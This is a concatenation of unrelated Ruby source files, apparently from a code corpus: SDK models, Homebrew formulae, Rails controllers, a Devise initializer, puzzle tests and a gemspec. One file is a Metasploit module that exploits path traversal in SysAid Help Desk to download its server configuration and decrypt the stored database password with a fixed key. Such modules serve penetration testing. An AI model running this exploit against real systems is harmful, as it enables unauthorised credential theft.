time_created == other.time_created && lifecycle_state == other.lifecycle_state && freeform_tags == other.freeform_tags && defined_tags == other.defined_tags && system_tags == other.system_tags end # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines # @see the `==` method # @param [Object] other the other object to be compared def eql?(other) self == other end # rubocop:disable Metrics/AbcSize, Layout/EmptyLines # Calculates hash code according to all attributes. 
# @return [Fixnum] Hash code def hash [id, display_name, compartment_id, vcn_id, subnet_id, private_endpoint_id, description, time_created, lifecycle_state, freeform_tags, defined_tags, system_tags].hash end # rubocop:enable Metrics/AbcSize, Layout/EmptyLines # rubocop:disable Metrics/AbcSize, Layout/EmptyLines # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.swagger_types.each_pair do |key, type| if type =~ /^Array<(.*)>/i # check to ensure the input is an array given that the the attribute # is documented as an array but the input is not if attributes[self.class.attribute_map[key]].is_a?(Array) public_method("#{key}=").call( attributes[self.class.attribute_map[key]] .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) } ) end elsif !attributes[self.class.attribute_map[key]].nil? public_method("#{key}=").call( OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]]) ) end # or else data not found in attributes(hash), not an issue as the data can be optional end self end # rubocop:enable Metrics/AbcSize, Layout/EmptyLines # Returns the string representation of the object # @return [String] String presentation of the object def to_s to_hash.to_s end # Returns the object in the form of hash # @return [Hash] Returns the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = public_method(attr).call next if value.nil? && !instance_variable_defined?("@#{attr}") hash[param] = _to_hash(value) end hash end private # Outputs non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value # @param [Object] value Any valid value # @return [Hash] Returns the value in the form of hash def _to_hash(value) if value.is_a?(Array) value.compact.map { |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end # rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
42.278443
245
0.685858
abffb265a89e0399aaacf98c4e346e6f1d33034e
1,481
class Libsvm < Formula
  desc "Library for support vector machines"
  homepage "https://www.csie.ntu.edu.tw/~cjlin/libsvm/"
  url "https://www.csie.ntu.edu.tw/~cjlin/libsvm/libsvm-3.20.tar.gz"
  sha256 "0f122480bef44dec4df6dae056f468c208e4e08c00771ec1b6dae2707fd945be"

  bottle do
    cellar :any
    sha1 "9a87d885fd4d943448c9107fe572ed0b5687bf5b" => :yosemite
    sha1 "8fcd71c75841c4def48a4f57312ab5aae4ee628e" => :mavericks
    sha1 "90e7456fa54524a2a12f563ae3e9bcab57d6ade7" => :mountain_lion
  end

  def install
    system "make", "CFLAGS=#{ENV.cflags}"
    system "make", "lib"
    bin.install "svm-scale", "svm-train", "svm-predict"
    lib.install "libsvm.so.2" => "libsvm.2.dylib"
    lib.install_symlink "libsvm.2.dylib" => "libsvm.dylib"
    system "install_name_tool", "-id", "#{lib}/libsvm.2.dylib",
           "#{lib}/libsvm.2.dylib"
    include.install "svm.h"
  end

  test do
    (testpath/"train_classification.txt").write <<-EOS.undent
      +1 201:1.2 3148:1.8 3983:1 4882:1
      -1 874:0.3 3652:1.1 3963:1 6179:1
      +1 1168:1.2 3318:1.2 3938:1.8 4481:1
      +1 350:1 3082:1.5 3965:1 6122:0.2
      -1 99:1 3057:1 3957:1 5838:0.3
    EOS
    (testpath/"train_regression.txt").write <<-EOS.undent
      0.23 201:1.2 3148:1.8 3983:1 4882:1
      0.33 874:0.3 3652:1.1 3963:1 6179:1
      -0.12 1168:1.2 3318:1.2 3938:1.8 4481:1
    EOS
    system "#{bin}/svm-train", "-s", "0", "train_classification.txt"
    system "#{bin}/svm-train", "-s", "3", "train_regression.txt"
  end
end
34.44186
87
0.669818
2815e840c88ec1e43eae8e92432f8d824d39dde6
4,277
# -*- encoding : utf-8 -*- =begin Copyright (C) 2008 Sam Roberts This library is free software; you can redistribute it and/or modify it under the same terms as the ruby language itself, see the file COPYING for details. =end require 'enumerator' require 'plist' require 'vpim/icalendar' require 'vpim/duration' module Vpim # A Repo is a representation of a calendar repository. # # Currently supported repository types are: # - Repo::Apple3, an Apple iCal3 repository. # - Repo::Directory, a directory hierarchy containing .ics files # # All repository types support at least the methods of Repo, and all # repositories return calendars that support at least the methods of # Repo::Calendar. class Repo include Enumerable # Open a repository at location +where+. def initialize(where) end # Enumerate the calendars in the repository. def each #:yield: calendar end # A calendar abstraction. It models a calendar in a calendar repository # that may not be an iCalendar. # # It has methods that behave identically to Icalendar, but it also has # methods like name and displayed that are not present in an iCalendar. class Calendar include Enumerable # The calendar name. def name end # Whether a calendar should be displayed. # # TODO - should be #displayed? def displayed end # Encode into iCalendar format. def encode end # Enumerate the components in the calendar, both todos and events, or # the specified klass. Like Icalendar#each() def each(klass=nil, &block) #:yield: component end # Enumerate the events in the calendar. def events(&block) #:yield: Vevent each(Vpim::Icalendar::Vevent, &block) end # Enumerate the todos in the calendar. def todos(&block) #:yield: Vtodo each(Vpim::Icalendar::Vtodo, &block) end # The method definitions are just to fool rdoc, not to be used. %w{each name displayed encode}.each{|m| remove_method m} def file_each(file, klass, &block) #:nodoc: unless iterator? return Enumerable::Enumerator.new(self, :each, klass) end cals = Vpim::Icalendar.decode(File.open(file)) cals.each do |cal| cal.each(klass, &block) end self end end end class Repo include Enumerable # An Apple iCal version 3 repository. class Apple3 < Repo def initialize(where = "~/Library/Calendars") @where = where.to_str end def each #:nodoc: Dir[ File.expand_path(@where + "/**/*.calendar") ].each do |dir| yield Calendar.new(dir) end self end class Calendar < Repo::Calendar def initialize(dir) # :nodoc: @dir = dir end def plist(key) #:nodoc: Plist::parse_xml( @dir + "/Info.plist")[key] end def name #:nodoc: plist "Title" end def displayed #:nodoc: 1 == plist("Checked") end def each(klass=nil, &block) #:nodoc: unless iterator? return Enumerable::Enumerator.new(self, :each, klass) end Dir[ @dir + "/Events/*.ics" ].map do |ics| file_each(ics, klass, &block) end self end def encode #:nodoc: Icalendar.create2 do |cal| each{|c| cal << c} end.encode end end end class Directory < Repo class Calendar < Repo::Calendar def initialize(file) #:nodoc: @file = file end def name #:nodoc: File.basename(@file) end def displayed #:nodoc: true end def each(klass, &block) #:nodoc: file_each(@file, klass, &block) end def encode #:nodoc: open(@file, "r"){|f| f.read} end end def initialize(where = ".") @where = where.to_str end def each #:nodoc: Dir[ File.expand_path(@where + "/**/*.ics") ].each do |file| yield Calendar.new(file) end self end end end end
23.371585
76
0.580781
111ef0529b549c4099e29cfd8a7b110928f2c56d
1,215
class GstPython < Formula
  desc "Python overrides for gobject-introspection-based pygst bindings"
  homepage "https://gstreamer.freedesktop.org/modules/gst-python.html"
  url "https://gstreamer.freedesktop.org/src/gst-python/gst-python-1.8.1.tar.xz"
  sha256 "76a3bfb72f9cb81d2b2cf8d07e420478e5b3592ea4b8056bb8c8127f73810a98"

  bottle do
    sha256 "c10f8eecb52a3d1139c0e414c79a07b481c15fcd51a9674cba273a57e6605c62" => :el_capitan
    sha256 "adca010f73dd2df8fed604f5674e54caf6bb61904adb147f64f62fb974262ac0" => :yosemite
    sha256 "e708aa675d5744fc36608249728290d6d97803cd071bf2ac91d245a9d8e8c996" => :mavericks
  end

  depends_on "gst-plugins-base"
  depends_on "pygobject3"

  link_overwrite "lib/python2.7/site-packages/gi/overrides"

  def install
    # pygi-overrides-dir switch ensures files don't break out of sandbox.
    system "./configure", "--disable-dependency-tracking",
                          "--disable-silent-rules",
                          "--prefix=#{prefix}",
                          "--with-pygi-overrides-dir=#{lib}/python2.7/site-packages/gi/overrides"
    system "make", "install"
  end

  test do
    system "#{Formula["gstreamer"].opt_bin}/gst-inspect-1.0", "python"
  end
end
39.193548
97
0.720165
f7538da134fbd418ea09779075869ae3b06f7004
1,619
class PasswordResetsController < ApplicationController
  before_action :get_user, only: [:edit, :update]
  before_action :valid_user, only: [:edit, :update]
  before_action :check_expiration, only: [:edit, :update]

  def new
  end

  def create
    @user = User.find_by(email: params[:password_reset][:email].downcase)
    if @user
      @user.create_reset_digest
      @user.send_password_reset_email
      flash[:info] = "Email sent with password reset instructions"
      redirect_to root_url
    else
      flash.now[:danger] = "Email address not found"
      render 'new'
    end
  end

  def edit
  end

  def update
    if params[:user][:password].empty?
      @user.errors.add(:password, "can't be empty")
      render 'edit'
    elsif @user.update_attributes(user_params)
      log_in @user
      @user.update_attribute(:reset_digest, nil)
      flash[:success] = "Password has been reset"
      redirect_to @user
    else
      render 'edit'
    end
  end

  private

  def user_params
    params.require(:user).permit(:password, :password_confirmation)
  end

  # Before filters

  def get_user
    @user = User.find_by(email: params[:email])
  end

  # Confirms a valid user
  def valid_user
    unless (@user && @user.activated? && @user.authenticated?(:reset, params[:id]))
      redirect_to root_url
    end
  end

  # Checks expiration of reset token
  def check_expiration
    if @user.password_reset_expired?
      flash[:danger] = "Password reset has expired"
      redirect_to new_password_reset_url
    end
  end
end
23.808824
73
0.643607
033c19fceddafe1179126d65a76cfda65b1747bf
4,116
#frozen_string_literal: true require 'set' # rows = y, cols = x # [y, x] # https://www.geeksforgeeks.org/number-integral-points-two-points/ require 'minitest/autorun' # https://adventofcode.com/2019/day/10 class Day10 < MiniTest::Test ASTEROID_MAP = DATA.read def test_1 map = <<~EOS .#..# ..... ##### ....# ...## EOS points = all_points(map) station = best_station(map) assert_equal [3, 4], station.first assert_equal 8, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_2 map = <<~EOS ......#.#. #..#.#.... ..#######. .#.#.###.. .#..#..... ..#....#.# #..#....#. .##.#..### ##...#..#. .#....#### EOS points = all_points(map) assert_equal [5, 8], best_station(map).first assert_equal 33, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_3 map = <<~EOS .#..##.###...####### ##.############..##. .#.######.########.# .###.#######.####.#. #####.##.#.##.###.## ..#####..#.######### #################### #.####....###.#.#.## ##.################# #####.##.###..####.. ..######..##.####### ####.##.####...##..# .#####..#.######.### ##...#.##########... #.##########.####### .####.#.###.###.#.## ....##.##.###..##### .#.#.###########.### #.#.#.#####.####.### ###.##.####.##.#..## EOS points = all_points(map) assert_equal 210, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_final_1 map = ASTEROID_MAP.dup points = all_points(map) assert_equal 280, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_final_2 map = ASTEROID_MAP.dup home, _ = best_station(map) row_cols = map.split("\n") height, width = row_cols.length, row_cols.first.length all_asteroids = all_points(map) directions = (-height..height).flat_map { |dy| (-width..width).map { |dx| [dx, dy] if dy.gcd(dx) == 1 }.compact } count = 0 answer = nil directions.sort_by { |dy, dx| -Math.atan2(dx, dy) }.cycle do |dx, dy| limit = 1 break if count == 200 while count < 200 x = (dx + home.last) * limit y = (dy + home.first) * limit break unless (0...height).cover?(y) && (0...width).cover?(x) limit += 1 coords = [y, x] asteroid = all_asteroids.delete(coords) next if asteroid.nil? if (count += 1) == 200 y, x = asteroid answer = x * 100 + y end end end assert_equal 706, answer end private def visible_from(from_point, points) visible = [].to_set points.each do |point| next if point == from_point vec = [point.first - from_point.first, point.last - from_point.last] gcd = vec.first.gcd(vec.last).abs vec = [vec.first / gcd, vec.last / gcd] visible << vec end visible end def best_station(map) points = all_points(map) points.map { |point| [point, visible_from(point, points)] }.max_by { |e| e.last.length } end def all_points(map) row_cols = map.split("\n") rows, cols = row_cols.length, row_cols.first.length points = [] rows.times do |row| cols.times do |col| points << [col, row] if row_cols[row][col] == '#' end end points end end __END__ .###.#...#.#.##.#.####.. .#....#####...#.######.. #.#.###.###.#.....#.#### ##.###..##..####.#.####. ###########.#######.##.# ##########.#########.##. .#.##.########.##...###. ###.#.##.#####.#.###.### ##.#####.##..###.#.##.#. .#.#.#####.####.#..##### .###.#####.#..#..##.#.## ########.##.#...######## .####..##..#.###.###.#.# ....######.##.#.######.# ###.####.######.#....### ############.#.#.##.#### ##...##..####.####.#..## .###.#########.###..#.## #.##.#.#...##...#####..# ##.#..###############.## ##.###.#####.##.######.. ##.#####.#.#.##..####### ...#######.######...#### #....#.#.#.####.#.#.#.##
24.5
92
0.406948
611e9be02e1d3e88600a7c0ed80e314e02799ae6
1,293
require 'spec_helper'

module Squeel
  module Nodes
    describe Predicate do
      it 'accepts a value on instantiation' do
        @p = Predicate.new :name, :eq, 'value'
        @p.value.should eq 'value'
      end

      it 'sets value via accessor' do
        @p = Predicate.new :name, :eq
        @p.value = 'value'
        @p.value.should eq 'value'
      end

      it 'sets value via %' do
        @p = Predicate.new :name, :eq
        @p % 'value'
        @p.value.should eq 'value'
      end

      it 'can be inquired for value presence' do
        @p = Predicate.new :name, :eq
        @p.value?.should be_false
        @p.value = 'value'
        @p.value?.should be_true
      end

      it 'can be ORed with another predicate' do
        left = Predicate.new :name, :eq, 'Joe'
        right = Predicate.new :name, :eq, 'Bob'
        combined = left | right
        combined.should be_a Nodes::Or
        combined.left.should eq left
        combined.right.should eq right
      end

      it 'can be ANDed with another predicate' do
        left = Predicate.new :name, :eq, 'Joe'
        right = Predicate.new :name, :eq, 'Bob'
        combined = left & right
        combined.should be_a Nodes::And
        combined.children.should eq [left, right]
      end
    end
  end
end
25.86
49
0.567672
f8ca4c03158646312ec5c4cd08ed94d0f9a40d12
1,326
# -*- encoding: utf-8 -*-
# stub: strscan 1.0.3 ruby lib
# stub: ext/strscan/extconf.rb

Gem::Specification.new do |s|
  s.name = "strscan".freeze
  s.version = "1.0.3"

  s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib".freeze]
  s.authors = ["Minero Aoki".freeze, "Sutou Kouhei".freeze]
  s.date = "2021-07-06"
  s.description = "Provides lexical scanning operations on a String.".freeze
  s.email = [nil, "[email protected]".freeze]
  s.extensions = ["ext/strscan/extconf.rb".freeze]
  s.files = ["ext/strscan/extconf.rb".freeze, "strscan.so".freeze]
  s.homepage = "https://github.com/ruby/strscan".freeze
  s.licenses = ["BSD-2-Clause".freeze]
  s.required_ruby_version = Gem::Requirement.new(">= 2.4.0".freeze)
  s.rubygems_version = "3.1.6".freeze
  s.summary = "Provides lexical scanning operations on a String.".freeze

  if s.respond_to? :specification_version then
    s.specification_version = 4
  end

  if s.respond_to? :add_runtime_dependency then
    s.add_development_dependency(%q<rake-compiler>.freeze, [">= 0"])
    s.add_development_dependency(%q<benchmark-driver>.freeze, [">= 0"])
  else
    s.add_dependency(%q<rake-compiler>.freeze, [">= 0"])
    s.add_dependency(%q<benchmark-driver>.freeze, [">= 0"])
  end
end
37.885714
112
0.69457
e2331c4197f7403238e081537faf4a72fb707313
13,711
# frozen_string_literal: true # Use this hook to configure devise mailer, warden hooks and so forth. # Many of these configuration options can be set straight in your model. Devise.setup do |config| # The secret key used by Devise. Devise uses this key to generate # random tokens. Changing this key will render invalid all existing # confirmation, reset password and unlock tokens in the database. # Devise will use the `secret_key_base` as its `secret_key` # by default. You can change it below and use your own secret key. config.secret_key = ENV['DEVISE_SECRET_KEY'] # ==> Controller configuration # Configure the parent class to the devise controllers. # config.parent_controller = 'DeviseController' # ==> Mailer Configuration # Configure the e-mail address which will be shown in Devise::Mailer, # note that it will be overwritten if you use your own mailer class # with default "from" parameter. config.mailer_sender = '[email protected]' # Configure the class responsible to send e-mails. # config.mailer = 'Devise::Mailer' # Configure the parent class responsible to send e-mails. # config.parent_mailer = 'ActionMailer::Base' # ==> ORM configuration # Load and configure the ORM. Supports :active_record (default) and # :mongoid (bson_ext recommended) by default. Other ORMs may be # available as additional gems. require 'devise/orm/active_record' # ==> Configuration for any authentication mechanism # Configure which keys are used when authenticating a user. The default is # just :email. You can configure it to use [:username, :subdomain], so for # authenticating a user, both parameters are required. Remember that those # parameters are used only when authenticating and not when retrieving from # session. If you need permissions, you should implement that in a before filter. # You can also supply a hash where the value is a boolean determining whether # or not authentication should be aborted when the value is not present. # config.authentication_keys = [:email] # Configure parameters from the request object used for authentication. Each entry # given should be a request method and it will automatically be passed to the # find_for_authentication method and considered in your model lookup. For instance, # if you set :request_keys to [:subdomain], :subdomain will be used on authentication. # The same considerations mentioned for authentication_keys also apply to request_keys. # config.request_keys = [] # Configure which authentication keys should be case-insensitive. # These keys will be downcased upon creating or modifying a user and when used # to authenticate or find a user. Default is :email. config.case_insensitive_keys = [:email] # Configure which authentication keys should have whitespace stripped. # These keys will have whitespace before and after removed upon creating or # modifying a user and when used to authenticate or find a user. Default is :email. config.strip_whitespace_keys = [:email] # Tell if authentication through request.params is enabled. True by default. # It can be set to an array that will enable params authentication only for the # given strategies, for example, `config.params_authenticatable = [:database]` will # enable it only for database (email + password) authentication. # config.params_authenticatable = true # Tell if authentication through HTTP Auth is enabled. False by default. 
# It can be set to an array that will enable http authentication only for the # given strategies, for example, `config.http_authenticatable = [:database]` will # enable it only for database authentication. The supported strategies are: # :database = Support basic authentication with authentication key + password # config.http_authenticatable = false # If 401 status code should be returned for AJAX requests. True by default. # config.http_authenticatable_on_xhr = true # The realm used in Http Basic Authentication. 'Application' by default. # config.http_authentication_realm = 'Application' # It will change confirmation, password recovery and other workflows # to behave the same regardless if the e-mail provided was right or wrong. # Does not affect registerable. # config.paranoid = true # By default Devise will store the user in session. You can skip storage for # particular strategies by setting this option. # Notice that if you are skipping storage for all authentication paths, you # may want to disable generating routes to Devise's sessions controller by # passing skip: :sessions to `devise_for` in your config/routes.rb config.skip_session_storage = [:http_auth] # By default, Devise cleans up the CSRF token on authentication to # avoid CSRF token fixation attacks. This means that, when using AJAX # requests for sign in and sign up, you need to get a new CSRF token # from the server. You can disable this option at your own risk. # config.clean_up_csrf_token_on_authentication = true # When false, Devise will not attempt to reload routes on eager load. # This can reduce the time taken to boot the app but if your application # requires the Devise mappings to be loaded during boot time the application # won't boot properly. # config.reload_routes = true # ==> Configuration for :database_authenticatable # For bcrypt, this is the cost for hashing the password and defaults to 11. If # using other algorithms, it sets how many times you want the password to be hashed. # # Limiting the stretches to just one in testing will increase the performance of # your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use # a value less than 10 in other environments. Note that, for bcrypt (the default # algorithm), the cost increases exponentially with the number of stretches (e.g. # a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation). config.stretches = Rails.env.test? ? 1 : 11 # Set up a pepper to generate the hashed password. # config.pepper = 'f70f11a4e0fdc4c4b475a9efaf92794115ab4eadfab3aec18c8bd2e1ad1a24f6a4949316e3969d01a3855e192f73eb3fac3f9069dc13a57438ed9b6d26ed7c62' # Send a notification to the original email when the user's email is changed. # config.send_email_changed_notification = false # Send a notification email when the user's password is changed. # config.send_password_change_notification = false # ==> Configuration for :confirmable # A period that the user is allowed to access the website even without # confirming their account. For instance, if set to 2.days, the user will be # able to access the website for two days without confirming their account, # access will be blocked just in the third day. Default is 0.days, meaning # the user cannot access the website without confirming their account. # config.allow_unconfirmed_access_for = 2.days # A period that the user is allowed to confirm their account before their # token becomes invalid. 
For example, if set to 3.days, the user can confirm # their account within 3 days after the mail was sent, but on the fourth day # their account can't be confirmed with the token any more. # Default is nil, meaning there is no restriction on how long a user can take # before confirming their account. # config.confirm_within = 3.days # If true, requires any email changes to be confirmed (exactly the same way as # initial account confirmation) to be applied. Requires additional unconfirmed_email # db field (see migrations). Until confirmed, new email is stored in # unconfirmed_email column, and copied to email column on successful confirmation. config.reconfirmable = true # Defines which key will be used when confirming an account # config.confirmation_keys = [:email] # ==> Configuration for :rememberable # The time the user will be remembered without asking for credentials again. # config.remember_for = 2.weeks # Invalidates all the remember me tokens when the user signs out. config.expire_all_remember_me_on_sign_out = true # If true, extends the user's remember period when remembered via cookie. # config.extend_remember_period = false # Options to be passed to the created cookie. For instance, you can set # secure: true in order to force SSL only cookies. # config.rememberable_options = {} # ==> Configuration for :validatable # Range for password length. # config.password_length = 6..128 # Email regex used to validate email formats. It simply asserts that # one (and only one) @ exists in the given string. This is mainly # to give user feedback and not to assert the e-mail validity. # config.email_regexp = /\A[^@\s]+@[^@\s]+\z/ # ==> Configuration for :timeoutable # The time you want to timeout the user session without activity. After this # time the user will be asked for credentials again. Default is 30 minutes. # config.timeout_in = 30.minutes # ==> Configuration for :lockable # Defines which strategy will be used to lock an account. # :failed_attempts = Locks an account after a number of failed attempts to sign in. # :none = No lock strategy. You should handle locking by yourself. # config.lock_strategy = :failed_attempts # Defines which key will be used when locking and unlocking an account # config.unlock_keys = [:email] # Defines which strategy will be used to unlock an account. # :email = Sends an unlock link to the user email # :time = Re-enables login after a certain amount of time (see :unlock_in below) # :both = Enables both strategies # :none = No unlock strategy. You should handle unlocking by yourself. # config.unlock_strategy = :both # Number of authentication tries before locking an account if lock_strategy # is failed attempts. # config.maximum_attempts = 20 # Time interval to unlock the account if :time is enabled as unlock_strategy. # config.unlock_in = 1.hour # Warn on the last attempt before the account is locked. # config.last_attempt_warning = true # ==> Configuration for :recoverable # # Defines which key will be used when recovering the password for an account # config.reset_password_keys = [:email] # Time interval you can reset your password with a reset password key. # Don't put a too small interval or your users won't have the time to # change their passwords. config.reset_password_within = 6.hours # When set to false, does not sign a user in automatically after their password is # reset. Defaults to true, so a user is signed in automatically after a reset. 
# config.sign_in_after_reset_password = true # ==> Configuration for :encryptable # Allow you to use another hashing or encryption algorithm besides bcrypt (default). # You can use :sha1, :sha512 or algorithms from others authentication tools as # :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20 # for default behavior) and :restful_authentication_sha1 (then you should set # stretches to 10, and copy REST_AUTH_SITE_KEY to pepper). # # Require the `devise-encryptable` gem when using anything other than bcrypt # config.encryptor = :sha512 # ==> Scopes configuration # Turn scoped views on. Before rendering "sessions/new", it will first check for # "users/sessions/new". It's turned off by default because it's slower if you # are using only default views. # config.scoped_views = false # Configure the default scope given to Warden. By default it's the first # devise role declared in your routes (usually :user). # config.default_scope = :user # Set this configuration to false if you want /users/sign_out to sign out # only the current scope. By default, Devise signs out all scopes. # config.sign_out_all_scopes = true # ==> Navigation configuration # Lists the formats that should be treated as navigational. Formats like # :html, should redirect to the sign in page when the user does not have # access, but formats like :xml or :json, should return 401. # # If you have any extra navigational formats, like :iphone or :mobile, you # should add them to the navigational formats lists. # # The "*/*" below is required to match Internet Explorer requests. # config.navigational_formats = ['*/*', :html] # The default HTTP method used to sign out a resource. Default is :delete. config.sign_out_via = :delete # ==> OmniAuth # Add a new OmniAuth provider. Check the wiki for more information on setting # up on your models and hooks. # config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo' # ==> Warden configuration # If you want to use other strategies, that are not supported by Devise, or # change the failure app, you can configure them inside the config.warden block. # # config.warden do |manager| # manager.intercept_401 = false # manager.default_strategies(scope: :user).unshift :some_external_strategy # end # ==> Mountable engine configurations # When using Devise inside an engine, let's call it `MyEngine`, and this engine # is mountable, there are some extra configurations to be taken into account. # The following options are available, assuming the engine is mounted as: # # mount MyEngine, at: '/my_engine' # # The router that invoked `devise_for`, in the example above, would be: # config.router_name = :my_engine # # When using OmniAuth, Devise cannot automatically set OmniAuth path, # so you need to do it manually. For the users scope, it would be: # config.omniauth_path_prefix = '/my_engine/users/auth' end
48.278169
150
0.749325
38d7e8b2a8d59bef90d4cfaa9dc4aed301c913c2
5,270
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'openssl' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'SysAid Help Desk Database Credentials Disclosure', 'Description' => %q{ This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated user to download arbitrary files from the system. This is used to download the server configuration file that contains the database username and password, which is encrypted with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-2996'], ['CVE', '2015-2998'], ['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'], ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'] ], 'DisclosureDate' => 'Jun 3 2015')) register_options( [ OptPort.new('RPORT', [true, 'The target port', 8080]), OptString.new('TARGETURI', [ true, 'SysAid path', '/sysaid']), ], self.class) end def decrypt_password (ciphertext) salt = [-87, -101, -56, 50, 86, 53, -29, 3].pack('c*') cipher = OpenSSL::Cipher::Cipher.new("DES") base_64_code = Rex::Text.decode_base64(ciphertext) cipher.decrypt cipher.pkcs5_keyivgen 'inigomontoya', salt, 19 plaintext = cipher.update base_64_code plaintext << cipher.final plaintext end def run begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'), 'vars_get' => { 'fileName' => '../conf/serverConf.xml' }, }) rescue Rex::ConnectionRefused fail_with(Failure::Unreachable, "#{peer} - Could not connect.") end if res && res.code == 200 && res.body.to_s.bytesize != 0 username = /\<dbUser\>(.*)\<\/dbUser\>/.match(res.body.to_s) encrypted_password = /\<dbPassword\>(.*)\<\/dbPassword\>/.match(res.body.to_s) database_url = /\<dbUrl\>(.*)\<\/dbUrl\>/.match(res.body.to_s) database_type = /\<dbType\>(.*)\<\/dbType\>/.match(res.body.to_s) unless username && encrypted_password && database_type && database_url fail_with(Failure::Unknown, "#{peer} - Failed to obtain database credentials.") end username = username.captures[0] encrypted_password = encrypted_password.captures[0] database_url = database_url.captures[0] database_type = database_type.captures[0] password = decrypt_password(encrypted_password[6..encrypted_password.length]) credential_core = report_credential_core({ password: password, username: username }) matches = /(\w*):(\w*):\/\/(.*)\/(\w*)/.match(database_url) if matches begin if database_url['localhost'] == 'localhost' db_address = matches.captures[2] db_port = db_address[(db_address.index(':') + 1)..(db_address.length - 1)].to_i db_address = rhost else db_address = matches.captures[2] if db_address.index(':') db_address = db_address[0, db_address.index(':')] db_port = db_address[db_address.index(':')..(db_address.length - 1)].to_i else db_port = 0 end db_address = Rex::Socket.getaddress(db_address, true) end database_login_data = { address: db_address, service_name: database_type, protocol: 'tcp', port: db_port, workspace_id: myworkspace_id, core: credential_core, status: Metasploit::Model::Login::Status::UNTRIED } create_credential_login(database_login_data) # Skip creating the Login, but tell the user about 
it if we cannot resolve the DB Server Hostname rescue SocketError fail_with(Failure::Unknown, 'Could not resolve database server hostname.') end print_status("Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") return end else fail_with(Failure::NotVulnerable, "#{peer} - Failed to obtain database credentials, response was: #{res.code}") end end def report_credential_core(cred_opts={}) origin_service_data = { address: rhost, port: rport, service_name: (ssl ? 'https' : 'http'), protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: self.fullname, private_type: :password, private_data: cred_opts[:password], username: cred_opts[:username] } credential_data.merge!(origin_service_data) create_credential(credential_data) end end
34.671053
117
0.617268
e2628e2908c515f2582b7279989e0c08a14c398e
270
# frozen_string_literal: true

module ClickHouse
  module Type
    class BaseType
      def cast(_value, *)
        raise NotImplementedError, __method__
      end

      def serialize(_value, *)
        raise NotImplementedError, __method__
      end
    end
  end
end
16.875
45
0.659259
acf452847993aa60ff07eb1af3a1986723ccd76b
1,130
class AnswersController < ApplicationController
  before_filter :find_question

  # POST /answers
  # POST /answers.json
  def create
    authorize! :create, Answer
    @answer = @question.answers.build(params[:answer])
    @answer.user = current_user

    if @answer.save
      @msg = t("alert.answer.create_success", default: 'Answer was successfully created.')
    else
      @msg = @answer.errors.full_messages.join("<br />")
    end
  end

  # PUT /answers/1
  # PUT /answers/1.json
  def update
    @answer = @question.answers.find(params[:id])
    authorize! :update, @answer

    if @answer.update_attributes(params[:answer])
      @msg = t("alert.answer.update_success", default: 'Update Successful.')
    else
      @msg = @error = @answer.errors.full_messages.join("<br />")
    end
  end

  # DELETE /answers/1
  # DELETE /answers/1.json
  def destroy
    @answer = @question.answers.find(params[:id])
    authorize! :destroy, @answer
    @answer.destroy

    head :no_content
  end

  protected

  def find_question
    @question = current_node.questions.find(params[:question_id])
  end
end
24.042553
90
0.654867
4a2713fee01c1ef47dc8dde4a3e0a3284ccc2df8
3,330
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Cosmosdb::Mgmt::V2020_03_01 module Models # # Parameters to create and update Cosmos DB Table. # class TableCreateUpdateParameters < ARMResourceProperties include MsRestAzure # @return [TableResource] The standard JSON format of a Table attr_accessor :resource # @return [CreateUpdateOptions] A key-value pair of options to be applied # for the request. This corresponds to the headers sent with the request. attr_accessor :options # # Mapper for TableCreateUpdateParameters class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'TableCreateUpdateParameters', type: { name: 'Composite', class_name: 'TableCreateUpdateParameters', model_properties: { id: { client_side_validation: true, required: false, read_only: true, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, location: { client_side_validation: true, required: false, serialized_name: 'location', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, resource: { client_side_validation: true, required: true, serialized_name: 'properties.resource', type: { name: 'Composite', class_name: 'TableResource' } }, options: { client_side_validation: true, required: true, serialized_name: 'properties.options', type: { name: 'Composite', class_name: 'CreateUpdateOptions' } } } 